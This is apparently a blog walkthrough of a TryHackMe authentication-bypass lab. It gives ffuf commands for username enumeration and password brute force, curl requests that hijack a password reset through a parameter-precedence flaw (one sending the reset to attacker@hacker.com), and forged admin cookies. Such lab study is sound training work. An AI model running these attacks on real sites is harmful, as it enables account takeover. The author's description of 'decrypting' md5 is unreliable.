Authentication Bypass (Write-up/Walkthrough)

Introduction

It is a relatively easy room to help you understand some authentication bypass techniques feel free to ask me about anything at Twitter and Linkedin

The Writeup/Walkthrough

NOTE: I really recommend using the try hack me attack box in order not to have problems deploying the tools or downloading the wordlists

First, we need to deploy the machine and go to this link http://MACHINE_IP/customers/signup (Replace Machine IP with your Machine Ip)

Task 2 Username Enumeration

In this task, the author mentioned a really smart technique which is:
When we try to log in using username:admin password:admin we get an error message “An account with this username already exists” (#ILoveErrors), this error is important because now we can try a lot of usernames and if we get this error this means that the username is in the database (Of course we won't try it one by one we will use AUTOMATION aka a tool called FFUF)

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists" > valid_usernames.txt

FFUF: FFUF is an acronym for “fuzz faster you fool!”. In one line, ffuf is an open-source web fuzzing tool developed in go used to identify hidden resources. But first, we understand what Fuzzing is? It is a process of sending random inputs to get errors or unexpected output.

-w: selects the file’s location on the computer that contains the list of usernames that we’re going to check exists

SecLists: SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

-X: specifies the request method

POST: this will be a GET request by default, but it is a POST request in our example

-d: specifies the data that we are going to send. In our example, we have the fields username, email, password, and cpassword

username: username field

email: email field

password: password field

cpassword: cpassword field

FUZZ: In the ffuf tool, the FUZZ keyword signifies where the contents from our wordlist will be inserted in the request.

-H: used for adding additional headers to the request. In this instance, we’re setting the Content-Type to the webserver knows we are sending form data.

Content-Type: setting the Content-Type to the webserver knows we are sending form data

-u: specifies the URL we are making the request to

-mr: the text on the page we are looking for to validate we’ve found a valid username.

>: outputting command

valid_usernames.txt: The file name we are putting the output into

now we gonna open the file using any text editor

nano valid_usernames.txt

now we have the usernames (if you got any weird symbols delete them and just leave the names one in each line so you dont have errors in task 3)

Task 3 Brute Force

What does brute force mean?
A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.

Now we will try to brute force the login page using fuzzing (ffuf)

Note: When running this command, make sure the terminal is in the same directory as the valid_usernames.txt file.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

(Don't forget to change the IP)

This ffuf command is a little different from the previous one in Task 2. Previously we used the FUZZ keyword to select where in the request the data from the wordlists would be inserted, but because we’re using multiple wordlists, we have to specify our own FUZZ keyword

W1: we’ve chosen W1 for our list of valid usernames
W2: we’ve chosen W1 for our list of valid passwords
-w: The multiple wordlists are again specified with the -w separated with a comma
-fc: For a positive match, we’re using the -fc argument to check for an HTTP status code other than 200.

Task 4 Logic Flaw

We’re going to examine the Reset Password function of the Acme IT Support website (http://MACHINE_IP/customers/reset). We see a form asking for the email address associated with the account on which we wish to perform the password reset. If an invalid email is entered, you’ll receive the error message “Account not found from supplied email address”.

For demonstration purposes, we’ll use the email address robert@acmeitsupport.thm which is accepted. We’re then presented with the next stage of the form, which asks for the username associated with this login email address. If we enter robert as the username and press the Check Username button, you’ll be presented with a confirmation message that a password reset email will be sent to robert@acmeitsupport.thm.

In the second step of the reset email process, the username is submitted in a POST field to the web server, and the email address is sent in the query string request as a GET field.

curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

(Don't forget to change the IP)

-H: to add an additional header to the request
In this instance, we are setting the Content-Type to application/x-www-form-urlencoded, which lets the web server know we are sending form data so it properly understands our request.

In the application, the user account is retrieved using the query string, but later on, in the application logic, the password reset email is sent using the data found in the PHP variable $_REQUEST.

The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favors POST data fields rather than the query string, so if we add another parameter to the POST form, we can control where the password reset email gets delivered.

curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'

(Don't forget to change the IP)

Now we need to make an account on the website

For the next step, you’ll need to create an account on the Acme IT support customer section, doing so gives you a unique email address that can be used to create support tickets. The email address is in the format of {username}@customer.acmeitsupport.thm

Now rerunning Curl Request 2 but with your @acmeitsupport.thm in the email field you’ll have a ticket created on your account which contains a link to log you in as Robert. Using Robert’s account, you can view their support tickets and reveal a flag

curl 'http://MACHINE_IP/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'

(Don't forget to change the IP)

now we can sign in using the support ticket on the website if we signed in with our account

Task 5 Cookie Tampering

First, we’ll start just by requesting the target page:

curl http://MACHINE_IP/cookie-test

(Don't forget to change the IP)

We can see we are returned a message of: Not Logged In

Now we’ll send another request with the logged_in cookie set to true and the admin cookie set to false:

curl -H "Cookie: logged_in=true; admin=false" http://MACHINE_IP/cookie-test

(Don't forget to change the IP)

We are given the message: Logged In As A User

Finally, we’ll send one last request setting both the logged_in and admin cookie to true:

curl -H "Cookie: logged_in=true; admin=true" http://MACHINE_IP/cookie-test

This returns the result: Logged In As An Admin as well as a flag which you can use to answer question one.

We will use this website to decrypt md5

We will use this website to decrypt/encrypt base64

/etc/takeaways

I learned more about ffuf, curl, encryption/decryption, and authentication bypass techniques

I love connecting with different people so if you want to say hi, I’ll be happy to meet you more! :)

LinkedIn
Twitter

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store